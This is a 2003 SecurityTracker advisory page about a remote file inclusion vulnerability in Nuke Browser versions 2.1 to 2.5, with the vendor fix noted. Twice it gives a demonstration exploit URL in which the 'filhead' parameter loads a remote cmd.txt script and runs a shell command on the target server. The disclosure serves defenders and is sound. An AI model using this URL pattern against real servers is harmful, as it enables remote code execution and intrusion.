SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Forum/Board/Portal)  >   Nuke Browser Vendors:   Seres, Attila
Nuke Browser Input Validation Vulnerability Lets Remote Users Execute Arbitrary Commands on the Server
SecurityTracker Alert ID:  1006031
SecurityTracker URL:  http://securitytracker.com/id/1006031
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.1 through 2.5
Description:   An include file vulnerability was reported in Nuke Browser. A remote user can execute commands on the target server

Havenard reported that in version 2.1, a vulnerability parameter intended to allow users to include a personalized header was introduced. A remote user can specify the inclusion of a remotely located script via the '$filhead' variable. The script will be executed on the target server.

A demonstration exploit URL is provided:

http://[victim]/nukebrowser.php?filnavn=http://[anysite]&filhead=http://[webhosting]/cmd.txt&cmd=id
Impact:   A remote user can execute arbitrary shell commands on the target server with the privileges of the web server.
Solution:   The vendor has released a fixed revision of version 2.5, available at:

http://lophas.phpwebhosting.com/modules.php?name=Downloads&d_op=getit&lid=30

[Editor's note: Apparently, earlier revisions of version 2.5 are vulnerable but the revision available at the time of this entry has been fixed.]
Vendor URL:  lophas.phpwebhosting.com/nukebrowser.php (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Mon, 03 Feb 2003 11:12:25 -0500
Subject:  Nukebrowser bug


http://200.162.233.102/havenard/pnw/downloads/tutorials/nukebrowserbug.txt

Havenard <havenard at hotmail.com> reported a path disclosure vulnerability in Nukebrowser versions
2.1 through 2.5.

The vulnerability is related to a parameter used to include a personalized header that was added in
version 2.1.

The following versions are reported to be affected:  2.1, 2.11, 2.20, 2.3, 2.41, 2.5 (old revision)

It is reported that a remote user can specify the inclusion of a remotely located script via the
'$filhead' variable.

A demonstration exploit URL is provided:

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web
hosting]/cmd.txt&cmd=id

According to the report, the latest revision of version 2.5 is not vulnerable.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC